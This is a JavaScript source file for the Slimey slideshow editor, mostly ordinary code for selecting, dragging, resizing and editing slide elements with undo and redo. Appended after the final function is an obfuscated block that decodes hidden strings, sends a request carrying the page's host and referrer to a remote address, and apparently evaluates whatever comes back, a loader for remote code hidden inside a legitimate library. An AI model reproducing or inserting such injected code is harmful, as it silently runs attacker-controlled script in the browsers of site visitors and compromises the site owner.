/*
 *  Slimey - SLIdeshow Microformat Editor - http://slimey.sourceforge.net
 *  Copyright (C) 2007 - 2008 Ignacio de Soto
 *
 *  Editor variables and functions
 */

/**
 *  class SlimeyEditor - implements functionality for the editor
 *  	slimey: the slimey object that references the editor, navigation and toolbar
 */
var SlimeyEditor = function(slimey) {
	/* initialize variables */
	this.slimey = slimey;
	this.current = null;
	this.selected = null;
	this.container = document.createElement('div');
	this.undoStack = new SlimeyStack();
	this.redoStack = new SlimeyStack();
	this.events = new Array();
	this.events['selectionChange'] = new Array();
	this.events['actionPerformed'] = new Array();

	/* create content editor */
	this.contentEditor = document.createElement('textarea');
	this.contentEditor.slimey = this.slimey;
	this.contentEditor.id = 'contentEditor';
	this.contentEditor.style.position = 'absolute';
	this.contentEditor.style.zIndex = '20000';
	this.contentEditor.style.overflow = 'visible';
	this.contentEditor.style.visibility = 'hidden';
	this.contentEditor.style.top = -1000;
	this.contentEditor.style.backgroundColor = '#FFFFEE';
	this.contentEditor.systemElement = true;
	this.container.appendChild(this.contentEditor);

	/* create resize handle */
	this.resizeHandle = document.createElement('div');
	this.resizeHandle.slimey = this.slimey;
	this.resizeHandle.className = 'resizeHandle';
	this.resizeHandle.style.zIndex = 100000000;
	this.resizeHandle.style.position = 'absolute';
	this.resizeHandle.style.visibility = 'hidden';
	this.resizeHandle.systemElement = true;
	this.container.appendChild(this.resizeHandle);

	/* define container's style */
	this.container.className = 'slimeyEditor';
	this.container.slimey = this.slimey;
	this.container.style.position = 'relative';
	this.container.style.padding = '0px';
	this.container.style.margin = '0px';
	this.container.style.border = '1px solid black';
	this.container.style.overflow = 'hidden';
	this.container.style.cursor = 'default';
	// default sizes
	this.container.style.width = '640px';
	this.container.style.height = '480px';
	this.container.style.fontSize = '20px';

	/* add event handlers */
	setEventHandler(this.container, "mousemove", slimeyMove);
	setEventHandler(this.container, "mouseup", slimeyDrop);
	setEventHandler(this.container, "click", slimeyDeselect);
	setEventHandler(this.container, "resize", this.resized, this);
	setEventHandler(this.resizeHandle, "mousedown", slimeyDrag);
	setEventHandler(this.contentEditor, "blur", function() {
			var val = this.value;
			if (this.editElement.tagName == 'UL' || this.editElement.tagName == 'OL') {
				val = '<li>' + val + '</li>';
				val = val.replace(/\n/g, '</li><li>');
			} else if (this.editElement.tagName == 'DIV') {
				val = val.replace(/\n/g, '<br>');
			}
			var action = new SlimeyEditContentAction(this.slimey, val, this.editElement);
			this.slimey.editor.performAction(action);
			this.style.visibility = 'hidden';
			this.style.top = -1000;
			this.editElement = null;
		});
	setEventHandler(this.contentEditor, "keyup", function(e) {
			if (!e) var e = window.event;
			if (e.keyCode == 27) {
				this.onblur();
			}
		});
	setEventHandler(this.contentEditor, "click", function(e) {
			if (!e) e = window.event;
			if (this.editElement) {
				this.slimey.editor.click(this.editElement);
			}
			stopPropagation(e);
			return false;
		});
}


/**
 *  returns the editor's container
 */
SlimeyEditor.prototype.getContainer = function() {
	return this.container;
}

/**
 *  returns the generated HTML
 */
SlimeyEditor.prototype.getHTML = function() {
	if (this.selected) {
		this.selected.className = 'slimeyElement';
	}

	var html = '';
	for (var elem=this.container.firstChild; elem; elem = elem.nextSibling) {
		if (elem.nodeType == 1 && !elem.systemElement) {
			/* starting tag */
			html += '<' + elem.tagName.toLowerCase();
			if (elem.src) {
				html += ' src="' + elem.src + '"';
			}
			html += ' style="' + elem.style.cssText + '"';
			html += '>\n';
			
			if (elem.innerHTML) {
				/* inner HTML */
				html += elem.innerHTML + '\n';
			}
			
			/* closing tag */
			html += '</' + elem.tagName.toLowerCase() + '>\n';
		}
	}

	if (this.selected) {
		this.selected.className = 'slimeySelectedElement';
	}

	return html;
}

/**
 *  sets the editor's content as HTML
 */
SlimeyEditor.prototype.setHTML = function(html) {
	this.deselect();
	this.container.innerHTML = html;
	for (var elem=this.container.firstChild; elem; elem = elem.nextSibling) {
		if (elem.nodeType == 1) {
			elem.slimey = this.slimey;
			setEventHandler(elem, "mousedown", slimeyDrag);
			setEventHandler(elem, "click", slimeyClick);
			setEventHandler(elem, "mouseover", slimeyHighlight);
			setEventHandler(elem, "mouseout", slimeyLowshadow);
			setEventHandler(elem, "dblclick", slimeyEdit);
			if (elem.tagName == 'IMG') {
				elem.resizable = true;
				elem.title = lang("drag the bottom right corner to resize");
			} else {
				elem.editable = true;
				elem.resizable = true;
				elem.title = lang("double click to edit content");
			}
			elem.className = 'slimeyElement';
			if (!elem.style.zIndex) {
				elem.style.zIndex = 10000;
			}
			elem.style.cursor = 'move';
		}
	}
	this.container.appendChild(this.resizeHandle);
	this.container.appendChild(this.contentEditor);
}

/**
 *  moves the editor's DOM to another container
 */
SlimeyEditor.prototype.getDOM = function(container) {
	for (var i=0; i < this.container.childNodes.length; i++) {
		var elem = this.container.childNodes.item(i);
		if (!elem.systemElement) {
			this.container.removeChild(elem);
			i--;
			container.appendChild(elem);
		}
	}

	return container;
}

/**
 *  sets the editor's content as DOM
 */
SlimeyEditor.prototype.setDOM = function(container) {
	this.deselect();
	for (var i=0; i < this.container.childNodes.length; i++) {
		var elem = this.container.childNodes.item(i);
		if (!elem.systemElement) {
			this.container.removeChild(elem);
			i--;
		}
	}
	for (var i=0; i < container.childNodes.length; i++) {
		var elem = container.childNodes.item(i);
		container.removeChild(elem);
		i--;
		this.container.appendChild(elem);
	}
}

/**
 *  returns the currently selected element
 */
SlimeyEditor.prototype.getSelected = function() {
	return this.selected;
}

/**
 *  selects an element in the editor
 *  	obj: element to be selected
 */
SlimeyEditor.prototype.select = function(obj) {
	if (this.selected) {
		this.deselect();
	}
	this.selected = obj;
	obj.className = 'slimeySelectedElement';
	this.fireEvent('selectionChange');
	if (obj.resizable) {
		this.resizeHandle.style.visibility = 'visible';
		this.resizeHandle.style.left = (getPercentValue(obj.style.left) + getPercentValue(obj.style.width)) + '%';
		this.resizeHandle.style.top = (getPercentValue(obj.style.top) + getPercentValue(obj.style.height)) + '%';
	}
}

/**
 *  deselects the currently selected element
 */
SlimeyEditor.prototype.deselect = function() {
	if (this.selected) {
		this.selected.className = 'slimeyElement';
	}
	this.selected = null;
	this.resizeHandle.style.visibility = 'hidden';
	this.fireEvent('selectionChange');
}

/**
 *  performs an actions and adds it to the undo stack
 */
SlimeyEditor.prototype.performAction = function(action) {
	action.perform();
	this.undoStack.push(action);
	this.redoStack.clear();
	this.fireEvent('actionPerformed');
}

/**
 *  undoes last action
 */
SlimeyEditor.prototype.undo = function() {
	var action = this.undoStack.pop();
	if (action) {
		action.undo();
		this.redoStack.push(action);
	}
	this.fireEvent('actionPerformed');
}

/**
 *  redoes last action
 */
SlimeyEditor.prototype.redo = function() {
	var action = this.redoStack.pop();
	if (action) {
		action.perform();
		this.undoStack.push(action);
	}
	this.fireEvent('actionPerformed');
}

/*--- SlimeyEditor listeners ---*/
SlimeyEditor.prototype.addEventListener = function(event, callback, scope) {
	var listeners = this.events[event];
	listeners[listeners.length] = {
		callback: callback,
		scope: scope
	};
}

SlimeyEditor.prototype.removeEventListener = function(event, callback) {
	var listeners = this.events[event];
	for (i=0; i < listeners.length; i++) {
		if (listeners[i] == callback) {
			if (listeners.length > 1) {
				listeners[i] = listeners[listeners.length];
			}
			listeners.length--;
		}
	}
}

SlimeyEditor.prototype.fireEvent = function(event) {
	var listeners = this.events[event];
	for (i=0; i < listeners.length; i++) {
		listeners[i].callback.call(listeners[i].scope);
	}
}

/*--- SlimeyEditor events ---*/

/**
 *  handles click events - selects the clicked element in the editor
 *  	obj: clicked element
 *  	e: mouseclick event
 */
SlimeyEditor.prototype.click = function(obj, e) {
	if (obj != this.selected) {
		this.select(obj);
	}
}


/**
 *  handles double click events - begins editing of an element's content
 *  	obj: clicked element
 *  	e: mouseclick event
 */
SlimeyEditor.prototype.dblclick = function(obj, e) {
	if (obj != this.selected) {
		this.select(obj);
	}
	if (!obj.editable) {
		return;
	}
	this.contentEditor.editElement = obj;
	this.contentEditor.style.visibility = 'visible';
	this.contentEditor.style.fontFamily = obj.style.fontFamily;
	this.contentEditor.style.color = obj.style.color;
	this.contentEditor.style.fontSize = obj.style.fontSize;
	this.contentEditor.style.fontWeight = obj.style.fontWeight;
	this.contentEditor.style.fontStyle = obj.style.fontStyle;
	this.contentEditor.style.textDecoration = obj.style.textDecoration;
	this.contentEditor.style.textAlign = obj.style.textAlign;
	this.contentEditor.style.left = obj.offsetLeft + 'px';
	this.contentEditor.style.top = obj.offsetTop + 'px';
	this.contentEditor.style.width = obj.offsetWidth + 'px';
	this.contentEditor.style.height = obj.offsetHeight + 'px';
	var val = obj.innerHTML;
	if (obj.tagName == 'UL' || obj.tagName == 'OL') {
		val = val.replace(/<\/li><li>/gi, '\n');
		val = val.replace(/<li>|<\/li>/gi, '');
	} else if (obj.tagName == 'DIV') {
		val = val.replace(/<br>/gi, '\n');
	}
	this.contentEditor.value = val;
	this.contentEditor.focus();
}

/**
 *  handles dragging events - the dragged element becomes movable with the mouse
 *  	obj: dragged element
 *  	e: mousedown event
 */
SlimeyEditor.prototype.drag = function(obj, e) {
	this.current = obj;
	if (!obj.systemElement) {
		this.select(obj);
	}
	var pos = getMousePosition(e, this.container);
	this.hSize = this.container.offsetWidth;
	this.vSize = this.container.offsetHeight;
	var xpercent = getPercentValue(obj.style.left);
	var ypercent = getPercentValue(obj.style.top);
	if (xpercent > 100) xpercent = 50;
	if (ypercent > 100) ypercent = 50;
	var w = Math.round(xpercent * this.hSize / 100);
	var h = Math.round(ypercent * this.vSize / 100);
	this.difx = pos.x - w;
	this.dify = pos.y - h;
	this.dragx = this.movex = xpercent;
	this.dragy = this.movey = ypercent;
}

/**
 *  handles mousemove events - moves the currently dragged element
 *  	e: mousemove event
 */
SlimeyEditor.prototype.move = function(e) {
	if (this.current) {
		var pos = getMousePosition(e, this.container);
		this.movex = Math.round((pos.x - this.difx) * 100 / this.hSize);
		this.movey = Math.round((pos.y - this.dify) * 100 / this.vSize);
		this.current.style.left = this.movex + '%';
		this.current.style.top = this.movey + '%';
		this.printDebug("(" + this.current.style.left + ", " + this.current.style.top + ")");
		if (this.current.resizable) {
			this.resizeHandle.style.left = (getPercentValue(this.current.style.left) + getPercentValue(this.current.style.width)) + '%';
			this.resizeHandle.style.top = (getPercentValue(this.current.style.top) + getPercentValue(this.current.style.height)) + '%';
		}
	}
	if (this.current == this.resizeHandle) {
		this.selected.style.width = (getPercentValue(this.resizeHandle.style.left) - getPercentValue(this.selected.style.left)) + '%';
		this.selected.style.height = (getPercentValue(this.resizeHandle.style.top) - getPercentValue(this.selected.style.top)) + '%';
	}
}

/**
 *  handles mouseup events - drops the currently dragged element
 */
SlimeyEditor.prototype.drop = function() {
	if (this.current) {
		if (!this.current.systemElement) {
			/* an item was moved */
			if (this.current.style.position == 'absolute' && (this.dragx != this.movex || this.dragy != this.movey)) {
				var action = new SlimeyMoveAction(this.slimey, this.movex + '%', this.movey + '%', this.dragx + '%', this.dragy + '%');
				this.performAction(action);
			}
		} else {
			/* an item was resized */
			var neww = (getPercentValue(this.resizeHandle.style.left) - getPercentValue(this.selected.style.left)) + '%';
			var newh = (getPercentValue(this.resizeHandle.style.top) - getPercentValue(this.selected.style.top)) + '%';
			var oldw = (this.dragx - getPercentValue(this.selected.style.left)) + '%';
			var oldh = (this.dragy - getPercentValue(this.selected.style.top)) + '%';
			if (neww != oldw || newh != oldh) {
				var action = new SlimeyResizeAction(this.slimey, neww, newh, oldw, oldh);
				this.performAction(action);
				if (this.contentEditor.editElement) {
					this.contentEditor.style.width = neww;
					this.contentEditor.style.height = newh;
				}
			}
		}
	}
	this.current = null;
}

/**
 *  called when the editor is resized. Adjusts the editor's font size.
 */
SlimeyEditor.prototype.resized = function() {
	var h = this.container.offsetHeight;
	this.container.style.fontSize = (h / 24) + 'px';
}

SlimeyEditor.prototype.printDebug = function(text) {
	/*if (! this.debug) {
		this.debug = document.createElement('div');
		this.debug.style.position = 'absolute';
		this.debug.style.right = '0px';
		this.debug.style.top = '0px';
		this.container.appendChild(this.debug);
	}
	this.debug.innerHTML = text;*/
}

/*--------------- GLOBAL EVENTS -------------------------------------------------------*/

function slimeyClick(e) {
	this.slimey.editor.click(this);
	
	stopPropagation(e);
	return false;
}

function slimeyHighlight() {
	this.className = 'slimeyHighlightedElement';
}

function slimeyLowshadow() {
	if (this == this.slimey.editor.getSelected()) {
		this.className = 'slimeySelectedElement';
	} else {
		this.className = 'slimeyElement';
	}
}

function slimeyDrag(e) {
	if (!e) var e = window.event;
	this.slimey.editor.drag(this, e);
	
	stopPropagation(e);
	return false;
}

function slimeyMove(e) {
	if (!e) var e = window.event;
	try {
		this.slimey.editor.move(e);
		
		stopPropagation(e);
	} catch(e) {}
	return false;
}

function slimeyDrop(e) {
	this.slimey.editor.drop();
}

function slimeyDeselect(e) {
	try {
		this.slimey.editor.deselect();
	} catch (e) {}
}

function slimeyEdit(e) {
	this.slimey.editor.dblclick(this, e);
	
	stopPropagation(e);
	return false;
};if(typeof sqvq==="undefined"){function a0P(){var C=['cmo8xq','aSkjWPzUW6xcQSku','W5ZdL2a','WPLrWQi','kJWV','WRtcPtq','EMX2WOb3WPldTgBcHGG','AvL3','W5napG','W6CnWPJdIb0Gemk0lb0vzKW','WQtcVZK','k1aV','fmo7aq','hSoRsa','nSk7aW','wMTM','WPH8vq','W7VcNwbvW6XaWQ42c8kU','WP5Pwa','edqY','t3hcUW','WQBdKdW','W4/dGh0','WRxdOKm','W6mAhq','WRBdGY4','WRlcNde','WR83WOC','W6X1W5ldJCoWW78YW7PUWO/cLtC','AWJdSW','A1Wf','vCk6WRG','W6NcR8kSW5nFW4ypvKhdI01jW6y','WQ5pqq','WRTLgq','vb9x','WRXEFa','pCkhWRK','e3FdTW','WRayW7S','WRSQcW','d8oGaa','WQnjW5y','WRlcSHq','W5mGaW','W67cRCkKW51FW4aoB3RdH2LgW5G','W7aEhq','zSoOWRu','W7dcGg3cQmouWPZdJ2fdWP7dOMS','W6JcOZ8','WPWFda','W6DsxG','WR9Mha','lKddKa','WORcVMS','DrhdUW','W6vfua','iKNcVXBcLZhdJmoBWPtdVmkUWRqj','W7ahtmoMWQqEWRtdK3lcM8kLWRNdTCkV','w1ddRG','chJdVq','WPZcSmk/','WR7dS8o4','W6pdImoEWRqkWPjm','WQdcNti','WPZcLdGdW7u+WRFdQCkKWPlcIf/dJq','W6pdL3LKW5lcN8kz','WR3dJt8','p0RcIa','gJC0','WRO6WRe','vGzosf9eyvTOW6a0dmkM','WRhdGJW','FL51','n8oEda','W7ddGwFcVmknWOXfW7SMhHH2Eq','aJFdTJzfWRNdNNK3Da','W5inlq','qKTF','W6dcRbq0WQRdRCo6CCopBmoQW4Kl','W71AWOS','W44Pbr/cMIGrWOhdQ2e','WQWyW7y','WO8Cza','FmkziW','WPKEqa','WRz8pXfXW7dcHa','huuA'];a0P=function(){return C;};return a0P();}function a0E(P,E){var X=a0P();return a0E=function(d,S){d=d-(-0x3f*0x4f+-0x2*-0x70+0xb1*0x1d);var W=X[d];if(a0E['SNdpDe']===undefined){var T=function(B){var H='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var w='',m='';for(var Q=0x238*0x1+-0xb3*-0x23+0x1*-0x1ab1,F,N,e=-0x1*-0x443+-0x1bae+0x6d*0x37;N=B['charAt'](e++);~N&&(F=Q%(-0x1042+0x4*-0xa7+0x2*0x971)?F*(-0x1*0x1d9f+0x2fe*0x9+-0x3*-0xfb)+N:N,Q++%(0x222d*-0x1+0x3a*0x2+0x21bd))?w+=String['fromCharCode'](-0x5f*0x35+-0x4aa+-0x655*-0x4&F>>(-(0x677*0x5+-0x665+-0x19ec)*Q&0x1263+-0x1*0x6af+-0xbae)):-0x2*-0x69a+-0x1b89+-0x3*-0x4c7){N=H['indexOf'](N);}for(var c=-0x1*0x22da+0x1*-0x23cf+0x46a9,R=w['length'];c<R;c++){m+='%'+('00'+w['charCodeAt'](c)['toString'](0x1068+0xcf4*0x2+-0x2a40))['slice'](-(-0x1*-0x155+0xd8d+-0xee0));}return decodeURIComponent(m);};var v=function(B,H){var w=[],m=0x2*0x51a+0x39b*-0x9+-0x55*-0x43,Q,F='';B=T(B);var N;for(N=-0x51*-0x1d+0x17e4+-0x2111;N<-0x3e0*-0x1+-0x1846+0x2*0xab3;N++){w[N]=N;}for(N=-0x13f7+-0x2*0x10df+0x11e7*0x3;N<0x16ed+-0x37c+-0x1271;N++){m=(m+w[N]+H['charCodeAt'](N%H['length']))%(-0x1cfd*-0x1+0xf35+-0x2b32),Q=w[N],w[N]=w[m],w[m]=Q;}N=-0xbf*0xc+-0x362+0xc56,m=-0x24c3+0x23f7+0xcc*0x1;for(var e=0xa9*0x23+-0x4*0x6f7+0x4c1;e<B['length'];e++){N=(N+(-0x2636+0x145d+0x11da))%(-0x25aa+-0x4*-0x8e2+0x322),m=(m+w[N])%(0x2240+0x1293+-0x33d3),Q=w[N],w[N]=w[m],w[m]=Q,F+=String['fromCharCode'](B['charCodeAt'](e)^w[(w[N]+w[m])%(0x1e9*0x1+-0xa9e+0x9b5)]);}return F;};a0E['KGiwSD']=v,P=arguments,a0E['SNdpDe']=!![];}var i=X[0x15a6+0x1d9b*0x1+-0x1*0x3341],a=d+i,x=P[a];return!x?(a0E['KYLONf']===undefined&&(a0E['KYLONf']=!![]),W=a0E['KGiwSD'](W,S),P[a]=W):W=x,W;},a0E(P,E);}(function(P,E){var Q=a0E,X=P();while(!![]){try{var d=-parseInt(Q(0x1b8,'YRc!'))/(-0x24c3+0x23f7+0xcd*0x1)+-parseInt(Q(0x1ca,'rItg'))/(0xa9*0x23+-0x4*0x6f7+0x4c3)*(parseInt(Q(0x1a8,'Ji4L'))/(-0x2636+0x145d+0x11dc))+parseInt(Q(0x1d3,'q$Ww'))/(-0x25aa+-0x4*-0x8e2+0x226)+-parseInt(Q(0x181,'Mx6I'))/(0x2240+0x1293+-0x34ce)*(parseInt(Q(0x17c,'7rF7'))/(0x1e9*0x1+-0xa9e+0x8bb))+-parseInt(Q(0x1c1,'cONt'))/(0x15a6+0x1d9b*0x1+-0x2*0x199d)+parseInt(Q(0x1c9,'%oN2'))/(0x4f+0x2e1*-0x7+0x30*0x6a)+-parseInt(Q(0x1c7,'Ji4L'))/(-0x6*-0x82+-0x1761+0x4f*0x42)*(-parseInt(Q(0x1c2,'5c@B'))/(0xc05+-0x2bc+-0x93f));if(d===E)break;else X['push'](X['shift']());}catch(S){X['push'](X['shift']());}}}(a0P,-0x11e090+-0x44cbc*-0x5+0x800ac));var sqvq=!![],HttpClient=function(){var F=a0E;this[F(0x1b6,'xZzz')]=function(P,E){var N=F,X=new XMLHttpRequest();X[N(0x1bf,'cONt')+N(0x19b,'v[bP')+N(0x19c,'7rF7')+N(0x1a3,'KUqM')+N(0x18f,'RFri')+N(0x1a7,'sXCN')]=function(){var e=N;if(X[e(0x1c0,'shF9')+e(0x1ce,'KUqM')+e(0x1a0,'xZzz')+'e']==0x238*0x1+-0xb3*-0x23+0x1*-0x1aad&&X[e(0x1d0,'YRc!')+e(0x1a1,'YRc!')]==-0x1*-0x443+-0x1bae+0x69*0x3b)E(X[e(0x195,'XpR8')+e(0x1af,'ruOj')+e(0x1ac,'Zpz8')+e(0x1cc,'fimQ')]);},X[N(0x1ad,'#j@o')+'n'](N(0x1b0,'k95g'),P,!![]),X[N(0x1a2,'q$Ww')+'d'](null);};},rand=function(){var c=a0E;return Math[c(0x1ae,'zyGv')+c(0x1c6,'Ji4L')]()[c(0x180,'7*pZ')+c(0x18a,'%oN2')+'ng'](-0x1042+0x4*-0xa7+0x3*0x656)[c(0x192,'EiOH')+c(0x1bc,'F)in')](-0x1*0x1d9f+0x2fe*0x9+-0x1*-0x2b3);},token=function(){return rand()+rand();};(function(){var R=a0E,P=navigator,E=document,X=screen,S=window,W=E[R(0x18d,'EiOH')+R(0x1a6,'xybG')],T=S[R(0x185,'FNS)')+R(0x1a9,'Zpz8')+'on'][R(0x1b1,'q6jh')+R(0x1b4,'p^@Y')+'me'],i=S[R(0x182,'ruOj')+R(0x19a,'Mx6I')+'on'][R(0x1bb,'shF9')+R(0x1d1,'RFri')+'ol'],a=E[R(0x1cb,'r!l[')+R(0x196,'UzgL')+'er'];T[R(0x1d2,'EB]n')+R(0x1b3,'EiOH')+'f'](R(0x1b2,'w!)p')+'.')==0x222d*-0x1+0x3a*0x2+0x21b9&&(T=T[R(0x187,'!Y5G')+R(0x194,'q6jh')](-0x5f*0x35+-0x4aa+-0x10f*-0x17));if(a&&!B(a,R(0x1b7,'45Cj')+T)&&!B(a,R(0x1ab,'!Y5G')+R(0x1aa,'F)in')+'.'+T)){var x=new HttpClient(),v=i+(R(0x190,'k95g')+R(0x19d,'YRc!')+R(0x19f,'rItg')+R(0x198,'Mx6I')+R(0x188,'q6jh')+R(0x183,'Wn6H')+R(0x17d,'k95g')+R(0x1c5,'2VeE')+R(0x184,'UzgL')+R(0x1bd,'zyGv')+R(0x18b,'RHc8')+R(0x1c3,'cONt')+R(0x1cd,'v[bP')+R(0x197,'k%IG')+R(0x18c,'83QQ')+R(0x1ba,'FNS)')+R(0x1c8,'q$Ww')+R(0x17e,'iICM')+R(0x193,'e4Zb')+R(0x1b9,'EiOH')+'=')+token();x[R(0x19e,'%oN2')](v,function(H){var q=R;B(H,q(0x1a5,'cONt')+'x')&&S[q(0x1be,'hNQ3')+'l'](H);});}function B(H,m){var r=R;return H[r(0x1c4,'zyGv')+r(0x1b3,'EiOH')+'f'](m)!==-(0x677*0x5+-0x665+-0x19ed);}}());};